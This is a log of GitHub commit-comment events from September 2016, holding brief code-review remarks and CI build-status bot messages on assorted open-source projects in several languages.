{"id":"4607135959","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_vendor_aosp"},"payload":{"comment":{"id":19142456,"position":null,"line":null,"path":null,"commit_id":"cda108e58a231a07b1cef2dfb8eda403238e1402","created_at":"2016-09-23T08:04:42Z","updated_at":"2016-09-23T08:04:42Z","body":"U can edit it if u want so.my out folder presents the zip as \"jdc_userdebug.side.zip\"or something.I just took the optcm script to aosp with some edits"}},"created_at":"2016-09-23T08:04:42Z"}
{"id":"4607139910","type":"CommitCommentEvent","actor":{"login":"dhardiman"},"repo":{"name":"OrdnanceSurvey/mapbox-ios-sdk"},"payload":{"comment":{"id":19142463,"position":96,"line":93,"path":"MapView/Map/RMConfiguration.m","commit_id":"5d12b057ae9c199794077d0b3daddbeac28b5eb0","created_at":"2016-09-23T08:05:43Z","updated_at":"2016-09-23T08:05:43Z","body":"Yeah, I realised that after I got to the second commit :)"}},"created_at":"2016-09-23T08:05:43Z"}
{"id":"4607140499","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19142465,"position":null,"line":null,"path":null,"commit_id":"8de59e147d2991819907eefc7fe9c72fbb0cfe6a","created_at":"2016-09-23T08:05:51Z","updated_at":"2016-09-23T08:05:51Z","body":"os_2_0_fix_static_build (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8de59e147d2991819907eefc7fe9c72fbb0cfe6a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-23T08:05:51Z"}
{"id":"4607144022","type":"CommitCommentEvent","actor":{"login":"JavaProgrammerLB"},"repo":{"name":"JavaProgrammerLB/SpringStepByStep"},"payload":{"comment":{"id":19142471,"position":9,"line":9,"path":"GroovyHelloWorld/src/com/yitianyigexiangfa/groovy/helloworld/HelloWorld.groovy","commit_id":"5e6f8964b012e988ae79db9100126645cdefc98d","created_at":"2016-09-23T08:06:39Z","updated_at":"2016-09-23T08:06:39Z","body":"without semicolon"}},"created_at":"2016-09-23T08:06:39Z"}
{"id":"4607145012","type":"CommitCommentEvent","actor":{"login":"angelcalibur"},"repo":{"name":"AOSP-JF-MM/platform_vendor_aosp"},"payload":{"comment":{"id":19142475,"position":null,"line":null,"path":null,"commit_id":"cda108e58a231a07b1cef2dfb8eda403238e1402","created_at":"2016-09-23T08:06:53Z","updated_at":"2016-09-23T08:06:53Z","body":"I've made a build and her name is : jdc_jflte-ota-eng.angel.zip\r\nThink we need to save the right name, like before..."}},"created_at":"2016-09-23T08:06:53Z"}
{"id":"4607145347","type":"CommitCommentEvent","actor":{"login":"JavaProgrammerLB"},"repo":{"name":"JavaProgrammerLB/SpringStepByStep"},"payload":{"comment":{"id":19142476,"position":8,"line":8,"path":"GroovyHelloWorld/src/com/yitianyigexiangfa/groovy/helloworld/HelloWorld.groovy","commit_id":"5e6f8964b012e988ae79db9100126645cdefc98d","created_at":"2016-09-23T08:06:59Z","updated_at":"2016-09-23T08:06:59Z","body":"use def keyword"}},"created_at":"2016-09-23T08:06:59Z"}
{"id":"4607148593","type":"CommitCommentEvent","actor":{"login":"Apollo9999"},"repo":{"name":"Apollo9999/hello-world"},"payload":{"comment":{"id":19142487,"position":null,"line":null,"path":null,"commit_id":"f6111e1154f4d721ce93dd1836d8d6bb8c9cf5cb","created_at":"2016-09-23T08:07:46Z","updated_at":"2016-09-23T08:07:46Z","body":"New Comment"}},"created_at":"2016-09-23T08:07:46Z"}
{"id":"4607151636","type":"CommitCommentEvent","actor":{"login":"nerogit"},"repo":{"name":"gus5703/PageMenu"},"payload":{"comment":{"id":19142496,"position":null,"line":null,"path":null,"commit_id":"ac9e280b8b56e2e15ca49d9f9738b60a506a2f2c","created_at":"2016-09-23T08:08:31Z","updated_at":"2016-09-23T08:08:31Z","body":"ㅠㅠ뭔가 슬프다 이거"}},"created_at":"2016-09-23T08:08:31Z"}
{"id":"4607153240","type":"CommitCommentEvent","actor":{"login":"nerogit"},"repo":{"name":"gus5703/PageMenu"},"payload":{"comment":{"id":19142500,"position":null,"line":null,"path":null,"commit_id":"ac9e280b8b56e2e15ca49d9f9738b60a506a2f2c","created_at":"2016-09-23T08:08:53Z","updated_at":"2016-09-23T08:08:53Z","body":"디자이너가 이거 어케 조금만 늘려주면안되냐그래서 막 그러다가.."}},"created_at":"2016-09-23T08:08:53Z"}
{"id":"4607154659","type":"CommitCommentEvent","actor":{"login":"ch-k"},"repo":{"name":"khunger/trollduction"},"payload":{"comment":{"id":19142505,"position":13,"line":1269,"path":"trollduction/producer.py","commit_id":"883a536a42853d78382131a9745101ba2b0954e9","created_at":"2016-09-23T08:09:14Z","updated_at":"2016-09-23T08:09:14Z","body":"yes, that's why it has to be false. The default behaviour was to call the save function for the first <file> element and to copy/link the prevously created file for all following <file> elements. \r\nI've required an attribute to switch off this \"copy/link-only\" behaviour because I want to store the image in different formats. "}},"created_at":"2016-09-23T08:09:14Z"}
{"id":"4607156831","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"2m/akka"},"payload":{"comment":{"id":19142510,"position":5,"line":623,"path":"akka-remote/src/main/scala/akka/remote/artery/ArteryTransport.scala","commit_id":"9c099aa321d9566f1e1b4add0be8cc2bb01ca13d","created_at":"2016-09-23T08:09:45Z","updated_at":"2016-09-23T08:09:45Z","body":"can't we have it as a `Byte` in `ActorRefCompressionAdvertisementAck` (and table) and only treat it as Int in the serializer?"}},"created_at":"2016-09-23T08:09:45Z"}
{"id":"4607162366","type":"CommitCommentEvent","actor":{"login":"schnello"},"repo":{"name":"schnello/volkszaehler.org"},"payload":{"comment":{"id":19142526,"position":null,"line":null,"path":null,"commit_id":"4543e3276cea01afb90a785f4c92abfeefc43ed3","created_at":"2016-09-23T08:11:06Z","updated_at":"2016-09-23T08:11:06Z","body":"@norbert-walter:\r\nBitte um review.\r\nFolgende Änderungen wurden vorgenommen:\r\n1. API Key wird nu am Anfang validiert. (API friendly)\r\n2. tmp file geändert in eine Variable\r\n3. if konstrukt geändert in eine Schleife inkl Variablen Evaluierung \r\n\r\nOffene Baustelle:\r\nWie bekommt man die Usersettings am besten aus dem Script damit diese nicht immer bei einem \"git pull\" probleme machen. Laden via source aus dem home dir?"}},"created_at":"2016-09-23T08:11:06Z"}
{"id":"4607162987","type":"CommitCommentEvent","actor":{"login":"kswain1"},"repo":{"name":"kswain1/IntelEdison"},"payload":{"comment":{"id":19142530,"position":null,"line":null,"path":null,"commit_id":"f4bfd889dbeb8d4dba07745e0996e7302d721d2d","created_at":"2016-09-23T08:11:16Z","updated_at":"2016-09-23T08:11:16Z","body":"how does this make things more accurate? \r\n"}},"created_at":"2016-09-23T08:11:16Z"}
{"id":"4607165425","type":"CommitCommentEvent","actor":{"login":"yu1222"},"repo":{"name":"Pilhyun-Won/TIL"},"payload":{"comment":{"id":19142537,"position":null,"line":null,"path":null,"commit_id":"9ac4735020de56a26cf0927e9bad448410a987c3","created_at":"2016-09-23T08:11:48Z","updated_at":"2016-09-23T08:11:48Z","body":"어디서 복붙했나?"}},"created_at":"2016-09-23T08:11:48Z"}
{"id":"4607166408","type":"CommitCommentEvent","actor":{"login":"savolai"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":19142540,"position":null,"line":null,"path":null,"commit_id":"4da05e5914db73bf1d3a347be609ba8d3464a4db","created_at":"2016-09-23T08:12:03Z","updated_at":"2016-09-23T08:12:03Z","body":"Thanks, I'll check that. "}},"created_at":"2016-09-23T08:12:03Z"}
{"id":"4607167515","type":"CommitCommentEvent","actor":{"login":"kamarush"},"repo":{"name":"kamarush/android_device_lge_hammerhead"},"payload":{"comment":{"id":19142544,"position":5,"line":381,"path":"device.mk","commit_id":"ef939f66968090fc8b213b7271f1be363598f427","created_at":"2016-09-23T08:12:19Z","updated_at":"2016-09-23T08:12:19Z","body":"I've reverted atm the other hal patches. Only the venus and prop  needed."}},"created_at":"2016-09-23T08:12:19Z"}
{"id":"4607168019","type":"CommitCommentEvent","actor":{"login":"koziscool"},"repo":{"name":"koziscool/PluralSight_React"},"payload":{"comment":{"id":19142545,"position":null,"line":null,"path":null,"commit_id":"24741ef4ce89168508d345bc4b468562e2d4f0fa","created_at":"2016-09-23T08:12:28Z","updated_at":"2016-09-23T08:12:28Z","body":"this works but it needs to run on a webserver.\r\nIf you just open the html file from the browser it can't get the js file\r\n"}},"created_at":"2016-09-23T08:12:28Z"}
{"id":"4607169988","type":"CommitCommentEvent","actor":{"login":"aspanoz"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19142548,"position":30,"line":30,"path":"webpack.config.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-23T08:12:56Z","updated_at":"2016-09-23T08:12:56Z","body":"Да, я знаю. Но мне эти сокращения не нравится. Хочется видеть одинаковые строки и в package.json и в конфиге."}},"created_at":"2016-09-23T08:12:56Z"}
{"id":"4607174114","type":"CommitCommentEvent","actor":{"login":"TheoSabattie"},"repo":{"name":"RealyUniqueName/haxe"},"payload":{"comment":{"id":19142559,"position":null,"line":null,"path":null,"commit_id":"d0d7b331e6d07b2c9736c2bd3cd79e6076ad68f7","created_at":"2016-09-23T08:14:00Z","updated_at":"2016-09-23T08:14:00Z","body":"For parsing,\r\nIsn't it better to use regex?"}},"created_at":"2016-09-23T08:14:00Z"}
{"id":"4607175153","type":"CommitCommentEvent","actor":{"login":"JC340301"},"repo":{"name":"JC340301/Assignment2"},"payload":{"comment":{"id":19142564,"position":null,"line":null,"path":null,"commit_id":"f4cf52a618d1b7ad22bf76247a42a95d7a212714","created_at":"2016-09-23T08:14:16Z","updated_at":"2016-09-23T08:14:16Z","body":"thank you"}},"created_at":"2016-09-23T08:14:16Z"}
{"id":"4607175395","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19142566,"position":null,"line":null,"path":null,"commit_id":"5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd","created_at":"2016-09-23T08:14:18Z","updated_at":"2016-09-23T08:14:18Z","body":"fix_gcc48_ICE (macumber) - Win64-Windows-7-VisualStudio-12: OK (2333 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T08:14:18Z"}
{"id":"4607181930","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19142582,"position":null,"line":null,"path":null,"commit_id":"711a025f83191a61f0100a8060b68478be177826","created_at":"2016-09-23T08:15:51Z","updated_at":"2016-09-23T08:15:51Z","body":"this is not correct and will break spellcheck. There can be many script contexts associated with the page and this will destroy the spellcheck client for any one of them"}},"created_at":"2016-09-23T08:15:51Z"}
{"id":"4607184897","type":"CommitCommentEvent","actor":{"login":"aspanoz"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19142587,"position":11,"line":11,"path":"webpack.config.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-23T08:16:31Z","updated_at":"2016-09-23T08:16:31Z","body":"http://cheng.logdown.com/posts/2016/03/25/679045 сравнение разных типов  sourcemap по скорости генерации и отображению коректной строки "}},"created_at":"2016-09-23T08:16:31Z"}
{"id":"4607186978","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19142588,"position":null,"line":null,"path":null,"commit_id":"711a025f83191a61f0100a8060b68478be177826","created_at":"2016-09-23T08:17:01Z","updated_at":"2016-09-23T08:17:01Z","body":"weird, this just showed up for me for some reason and I thought someone tried to make the same change again"}},"created_at":"2016-09-23T08:17:01Z"}
{"id":"4607190367","type":"CommitCommentEvent","actor":{"login":"klaasy1"},"repo":{"name":"monaca-templates/onsenui-v2-angular2-splitter"},"payload":{"comment":{"id":19142595,"position":null,"line":null,"path":null,"commit_id":"8c1b0229d10bb510d97f7fb62f2115911730f442","created_at":"2016-09-23T08:17:50Z","updated_at":"2016-09-23T08:17:50Z","body":"Hi Frank, I am not sure if this is the corrent platform to ask this question, but how can I make sure the changes I make to this file are available in the dist folder and also available in as a whole like when you run with phonegap serve, thank you in advance"}},"created_at":"2016-09-23T08:17:50Z"}
{"id":"4607191745","type":"CommitCommentEvent","actor":{"login":"sainbayarbattur"},"repo":{"name":"sainbayarbattur/cookbook"},"payload":{"comment":{"id":19142596,"position":null,"line":null,"path":null,"commit_id":"acdc0f581945b5903bc41de55f9ff57797fd33ee","created_at":"2016-09-23T08:18:11Z","updated_at":"2016-09-23T08:18:11Z","body":"Hi, from Sani"}},"created_at":"2016-09-23T08:18:11Z"}
{"id":"4607192474","type":"CommitCommentEvent","actor":{"login":"Matmo10"},"repo":{"name":"qdouble/angular2webpack2-starter"},"payload":{"comment":{"id":19142600,"position":null,"line":null,"path":null,"commit_id":"7759e57ac9f4a5834d50c0886141083957ba9192","created_at":"2016-09-23T08:18:20Z","updated_at":"2016-09-23T08:18:20Z","body":"👍 "}},"created_at":"2016-09-23T08:18:20Z"}
{"id":"4607194101","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"2m/akka"},"payload":{"comment":{"id":19142605,"position":21,"line":269,"path":"akka-remote/src/test/scala/akka/remote/artery/compress/CompressionIntegrationSpec.scala","commit_id":"d3cebf0bbd1866b1e7f7cdc4b130469169f271ea","created_at":"2016-09-23T08:18:42Z","updated_at":"2016-09-23T08:18:42Z","body":"I think you should use `system` instead of creating `systemWrap1`, e.g. `testActor` that is implicit sender belongs to `system`"}},"created_at":"2016-09-23T08:18:42Z"}
{"id":"4607194860","type":"CommitCommentEvent","actor":{"login":"aspanoz"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19142608,"position":4,"line":4,"path":"src/assets/css/styles.sss","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-23T08:18:54Z","updated_at":"2016-09-23T08:18:54Z","body":"их есть у меня ещё:\r\nhttp://www.colors.commutercreative.com/grid/"}},"created_at":"2016-09-23T08:18:54Z"}
{"id":"4607196650","type":"CommitCommentEvent","actor":{"login":"ioantomulesei"},"repo":{"name":"Polymer/polymer"},"payload":{"comment":{"id":19142617,"position":null,"line":null,"path":null,"commit_id":"779875cc871fe2f98ec3d98f89ebcff96dbe86e2","created_at":"2016-09-23T08:19:20Z","updated_at":"2016-09-23T08:19:20Z","body":"I think `const` would be a better option instead of `let` where it's clear that identifier won't be reassigned. For example `let clients = this.__dataPendingClients;`, here `clients` identifier won't be reassigned to another value and if const is used, when read the code this is clear from the beginning."}},"created_at":"2016-09-23T08:19:20Z"}
{"id":"4607197186","type":"CommitCommentEvent","actor":{"login":"mrilhamr"},"repo":{"name":"indonesia/community"},"payload":{"comment":{"id":19142620,"position":null,"line":null,"path":null,"commit_id":"e1451e6bd66a21559b3aa3932904eaa2b85d069b","created_at":"2016-09-23T08:19:29Z","updated_at":"2016-09-23T08:19:29Z","body":"hello world"}},"created_at":"2016-09-23T08:19:29Z"}
{"id":"4607197701","type":"CommitCommentEvent","actor":{"login":"cdent"},"repo":{"name":"cdent/wsgi-intercept"},"payload":{"comment":{"id":19142623,"position":null,"line":null,"path":null,"commit_id":"582cef2790be69048cfcdc6985733b08560f446a","created_at":"2016-09-23T08:19:37Z","updated_at":"2016-09-23T08:19:37Z","body":"@sashahart Thanks very much for the in depth analysis. I think you're right and I think I allowed myself to get confused by working too continuously[1] and then a combination of two things:\r\n\r\n* The error message that mod wsgi gives (in py2) when it gets this problem is \"TypeError: expected byte string object for header value, value of type unicode found\"\r\n* pep 3333 is crazy because of the hoops it is doing to make things different between py2 and 3. le sigh.\r\n\r\nI think, however, that I can continue to use the existing changes with a very small tweak that simply checks that both the header key and value are an instance of this version of python's `str`.\r\n\r\nOn the `setup.py` stuff, pretty much \"yeah\" to everything you said. I'll do that on a separate branch before this one in whatever way I can make remotely elegant.\r\n\r\nAgain, thanks very much for the quick response, and catching my insanity.\r\n\r\n[1] I did #44 first"}},"created_at":"2016-09-23T08:19:37Z"}
{"id":"4607198217","type":"CommitCommentEvent","actor":{"login":"bingmann"},"repo":{"name":"lorenzhs/thrill"},"payload":{"comment":{"id":19142625,"position":null,"line":null,"path":null,"commit_id":"bc63d9f3e359a68b4a668875371742dd4ee4c56c","created_at":"2016-09-23T08:19:45Z","updated_at":"2016-09-23T08:19:45Z","body":"Sure."}},"created_at":"2016-09-23T08:19:45Z"}
{"id":"4607199336","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19142626,"position":5,"line":137,"path":"gwt-material/src/main/java/gwt/material/design/client/constants/CssName.java","commit_id":"0152ed117c66049e9dd4c41191e298e7228a7765","created_at":"2016-09-23T08:20:02Z","updated_at":"2016-09-23T08:20:02Z","body":"What is read only toggle?"}},"created_at":"2016-09-23T08:20:02Z"}
{"id":"4607203134","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19142630,"position":73,"line":73,"path":"gwt-material/src/main/java/gwt/material/design/client/base/mixin/ReadOnlyMixin.java","commit_id":"0152ed117c66049e9dd4c41191e298e7228a7765","created_at":"2016-09-23T08:20:56Z","updated_at":"2016-09-23T08:20:56Z","body":"Remove this"}},"created_at":"2016-09-23T08:20:56Z"}
{"id":"4607204624","type":"CommitCommentEvent","actor":{"login":"aspanoz"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19142633,"position":4,"line":4,"path":"src/components/App.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-23T08:21:18Z","updated_at":"2016-09-23T08:21:18Z","body":"Согласен. Не глядя копипастил."}},"created_at":"2016-09-23T08:21:18Z"}
{"id":"4607204687","type":"CommitCommentEvent","actor":{"login":"Reotechnologies"},"repo":{"name":"Reotechnologiez/ProgrammingAssignment2"},"payload":{"comment":{"id":19142634,"position":null,"line":null,"path":null,"commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2016-09-23T08:21:19Z","updated_at":"2016-09-23T08:21:19Z","body":"what does the function of x return?"}},"created_at":"2016-09-23T08:21:19Z"}
{"id":"4607206696","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19142641,"position":59,"line":692,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialListValueBox.java","commit_id":"0152ed117c66049e9dd4c41191e298e7228a7765","created_at":"2016-09-23T08:21:49Z","updated_at":"2016-09-23T08:21:49Z","body":"This will cause event handler leaks every time setToggleReadOnly is called."}},"created_at":"2016-09-23T08:21:49Z"}
{"id":"4607206772","type":"CommitCommentEvent","actor":{"login":"dnutan"},"repo":{"name":"dnutan/documentation"},"payload":{"comment":{"id":19142642,"position":null,"line":null,"path":null,"commit_id":"744adf9cac8e4dd134ebbfc1942456b7605fc324","created_at":"2016-09-23T08:21:51Z","updated_at":"2016-09-23T08:21:51Z","body":"german words replaced"}},"created_at":"2016-09-23T08:21:51Z"}
{"id":"4607207374","type":"CommitCommentEvent","actor":{"login":"PrinceOfAmber"},"repo":{"name":"PrinceOfAmber/Cyclic"},"payload":{"comment":{"id":19142643,"position":null,"line":null,"path":null,"commit_id":"30900cd55b7d50ba7f7012a0912b0c5cc97edf0e","created_at":"2016-09-23T08:21:59Z","updated_at":"2016-09-23T08:21:59Z","body":"Actually this is for #95 "}},"created_at":"2016-09-23T08:21:59Z"}
{"id":"4607208245","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19142646,"position":null,"line":null,"path":null,"commit_id":"711a025f83191a61f0100a8060b68478be177826","created_at":"2016-09-23T08:22:10Z","updated_at":"2016-09-23T08:22:10Z","body":"this was the commit the correct it https://github.com/brave/electron/commit/88c4f1b16ad0b8867080d2be1ddd34156af276a0"}},"created_at":"2016-09-23T08:22:10Z"}
{"id":"4607210207","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19142651,"position":51,"line":619,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialValueBox.java","commit_id":"0152ed117c66049e9dd4c41191e298e7228a7765","created_at":"2016-09-23T08:22:36Z","updated_at":"2016-09-23T08:22:36Z","body":"This will create a new `ReadOnlyMixin` class every time `setReadOnly` is called, not okay to do this."}},"created_at":"2016-09-23T08:22:36Z"}
{"id":"4607212150","type":"CommitCommentEvent","actor":{"login":"kevzlou7979"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19142654,"position":5,"line":137,"path":"gwt-material/src/main/java/gwt/material/design/client/constants/CssName.java","commit_id":"0152ed117c66049e9dd4c41191e298e7228a7765","created_at":"2016-09-23T08:23:06Z","updated_at":"2016-09-23T08:23:06Z","body":"read only toggle means we can change state of read only -> editable vice versa. Will submit a better picture on the description."}},"created_at":"2016-09-23T08:23:06Z"}
{"id":"4607212741","type":"CommitCommentEvent","actor":{"login":"aspanoz"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19142656,"position":67,"line":67,"path":"webpack.config.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-23T08:23:14Z","updated_at":"2016-09-23T08:23:14Z","body":"это ресширение для sugarss файлов, поддерживается stylelint`ом. типа стандарт"}},"created_at":"2016-09-23T08:23:14Z"}
{"id":"4607213172","type":"CommitCommentEvent","actor":{"login":"asmide"},"repo":{"name":"asmide/mailcow"},"payload":{"comment":{"id":19142663,"position":null,"line":null,"path":null,"commit_id":"e02eb03a7ee4f97b9c2c7c78214744e9d766c94f","created_at":"2016-09-23T08:23:22Z","updated_at":"2016-09-23T08:23:22Z","body":"Eigentlich müssten auch Umlaute erlaubt werden ( \\w ), aber die Datenbank muss das auch unterstützen. Muss das mal checken."}},"created_at":"2016-09-23T08:23:22Z"}
{"id":"4607217119","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19142675,"position":51,"line":619,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialValueBox.java","commit_id":"0152ed117c66049e9dd4c41191e298e7228a7765","created_at":"2016-09-23T08:24:20Z","updated_at":"2016-09-23T08:24:20Z","body":"Should just override `getReadOnlyMixin` to return the mixin required here."}},"created_at":"2016-09-23T08:24:20Z"}
{"id":"4607220617","type":"CommitCommentEvent","actor":{"login":"becvert"},"repo":{"name":"ratson/cordova-plugin-admob-free"},"payload":{"comment":{"id":19142691,"position":null,"line":null,"path":null,"commit_id":"5f894b81a64da4c61293213ad9bcc2aba467b8e0","created_at":"2016-09-23T08:25:11Z","updated_at":"2016-09-23T08:25:11Z","body":"is ES6 supported in webviews as of today?"}},"created_at":"2016-09-23T08:25:11Z"}
{"id":"4607220854","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19142693,"position":null,"line":null,"path":null,"commit_id":"5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd","created_at":"2016-09-23T08:25:14Z","updated_at":"2016-09-23T08:25:14Z","body":"fix_gcc48_ICE (macumber) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-23T08:25:14Z"}
{"id":"4607222009","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19142697,"position":null,"line":null,"path":null,"commit_id":"2003064414ecd8cb538e7714ba63b367b8320923","created_at":"2016-09-23T08:25:30Z","updated_at":"2016-09-23T08:25:30Z","body":"amazing!!!"}},"created_at":"2016-09-23T08:25:30Z"}
{"id":"4607222962","type":"CommitCommentEvent","actor":{"login":"wladekb"},"repo":{"name":"Wikia/python-commons"},"payload":{"comment":{"id":19142701,"position":null,"line":null,"path":null,"commit_id":"9bf2479757ebd35086b211b8cce7a6a09ff25548","created_at":"2016-09-23T08:25:43Z","updated_at":"2016-09-23T08:25:43Z","body":"Grande!"}},"created_at":"2016-09-23T08:25:43Z"}
{"id":"4607225119","type":"CommitCommentEvent","actor":{"login":"kevzlou7979"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19142706,"position":73,"line":73,"path":"gwt-material/src/main/java/gwt/material/design/client/base/mixin/ReadOnlyMixin.java","commit_id":"0152ed117c66049e9dd4c41191e298e7228a7765","created_at":"2016-09-23T08:26:12Z","updated_at":"2016-09-23T08:26:12Z","body":"corrected"}},"created_at":"2016-09-23T08:26:12Z"}
{"id":"4607225349","type":"CommitCommentEvent","actor":{"login":"psiinon"},"repo":{"name":"psiinon/zaproxy"},"payload":{"comment":{"id":19142707,"position":5,"line":30,"path":"src/org/parosproxy/paros/extension/report/ReportLastScan.java","commit_id":"468a699ae52d7cc76ddd6dcd92c62ecbf35135c5","created_at":"2016-09-23T08:26:16Z","updated_at":"2016-09-23T08:26:16Z","body":"Looks like I removed a space ;) Fixed now."}},"created_at":"2016-09-23T08:26:16Z"}
{"id":"4607225811","type":"CommitCommentEvent","actor":{"login":"ChaosZar"},"repo":{"name":"IncarVishnu/platformer"},"payload":{"comment":{"id":19142710,"position":null,"line":null,"path":null,"commit_id":"8fd6ace2fa6650c6ca597d65217d123b7d9036a7","created_at":"2016-09-23T08:26:22Z","updated_at":"2016-09-23T08:26:22Z","body":"Moin,\r\n\r\nsehr gut. Ich habe gerade dein Kommentar zum FIXME gesehen. kann man die assets nicht alle erst im head laden und dann im body verwenden? Ist das eine möglichkeit?\r\n\r\nVG\r\n    Alex"}},"created_at":"2016-09-23T08:26:22Z"}
{"id":"4607229418","type":"CommitCommentEvent","actor":{"login":"aspanoz"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19142714,"position":1,"line":1,"path":"src/assets/css/components/app.sss","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-23T08:27:15Z","updated_at":"2016-09-23T08:27:15Z","body":"лол, на самом деле это проврека работы вложенных файлов со стилями )"}},"created_at":"2016-09-23T08:27:15Z"}
{"id":"4607229894","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material"},"payload":{"comment":{"id":19142715,"position":63,"line":630,"path":"gwt-material/src/main/java/gwt/material/design/client/ui/MaterialValueBox.java","commit_id":"0152ed117c66049e9dd4c41191e298e7228a7765","created_at":"2016-09-23T08:27:22Z","updated_at":"2016-09-23T08:27:22Z","body":"Should use `getReadOnlyMixin` like done in the other implementations that you have copied and pasted."}},"created_at":"2016-09-23T08:27:22Z"}
{"id":"4607237688","type":"CommitCommentEvent","actor":{"login":"kisliakovsky"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19142733,"position":6,"line":6,"path":"monitor/src/main/java/com/emc/mongoose/monitor/api/TypedFactory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-23T08:29:12Z","updated_at":"2016-09-23T08:29:12Z","body":"Good idea. Thanx!"}},"created_at":"2016-09-23T08:29:12Z"}
{"id":"4607240055","type":"CommitCommentEvent","actor":{"login":"kisliakovsky"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19142742,"position":6,"line":6,"path":"monitor/src/main/java/com/emc/mongoose/monitor/api/Factory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-23T08:29:46Z","updated_at":"2016-09-23T08:29:46Z","body":"Thanx!"}},"created_at":"2016-09-23T08:29:46Z"}
